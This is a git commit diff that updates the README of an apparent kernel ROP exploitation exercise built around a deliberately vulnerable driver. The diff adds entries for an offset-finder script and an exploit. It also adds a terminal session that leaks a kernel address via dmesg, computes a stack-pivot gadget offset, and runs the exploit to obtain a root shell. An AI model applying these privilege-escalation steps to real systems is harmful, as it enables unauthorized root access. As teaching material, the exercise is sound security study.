updated readme
This commit is contained in:
parent
b5dab95d89
commit
29f751183f
19
README.md
19
README.md
@ -13,6 +13,8 @@ the function address to be executed.
|
|||||||
* drv.c - vulnerable kernel driver
|
* drv.c - vulnerable kernel driver
|
||||||
* trigger.c - user-space application to trigger the OOB access via the provided
|
* trigger.c - user-space application to trigger the OOB access via the provided
|
||||||
ioctl
|
ioctl
|
||||||
|
* find_offset.py - helper script for finding the correct offset into the "ops" array
|
||||||
|
* rop_exploit.c - ROP exploit for the "drv.c" kernel driver
|
||||||
|
|
||||||
The goal is to construct and execute a ROP chain that will satisfy the
|
The goal is to construct and execute a ROP chain that will satisfy the
|
||||||
following requirements:
|
following requirements:
|
||||||
@ -21,3 +23,20 @@ following requirements:
|
|||||||
* Data residing in user space may be referenced (i.e., "fetching" data from
|
* Data residing in user space may be referenced (i.e., "fetching" data from
|
||||||
user space is allowed)
|
user space is allowed)
|
||||||
* Instructions residing in user space may not be executed
|
* Instructions residing in user space may not be executed
|
||||||
|
|
||||||
|
```
|
||||||
|
vnik@ubuntu:~$ dmesg | grep addr | grep ops
|
||||||
|
[ 244.142035] addr(ops) = ffffffffa02e9340
|
||||||
|
vnik@ubuntu:~$ ~/find_offset.py ffffffffa02e9340 ~/gadgets
|
||||||
|
offset = 18446744073644231139
|
||||||
|
gadget = xchg eax, esp ; ret 0x11e8
|
||||||
|
stack addr = 8108e258
|
||||||
|
|
||||||
|
vnik@ubuntu:~/kernel_rop/vulndrv$ gcc rop_exploit.c -O2 -o rop_exploit
|
||||||
|
vnik@ubuntu:~/kernel_rop/vulndrv$ ./rop_exploit 18446744073644231139 ffffffffa02e9340
|
||||||
|
array base address = 0xffffffffa02e9340
|
||||||
|
stack address = 0x8108e258
|
||||||
|
# id
|
||||||
|
uid=0(root) gid=0(root) groups=0(root)
|
||||||
|
#
|
||||||
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user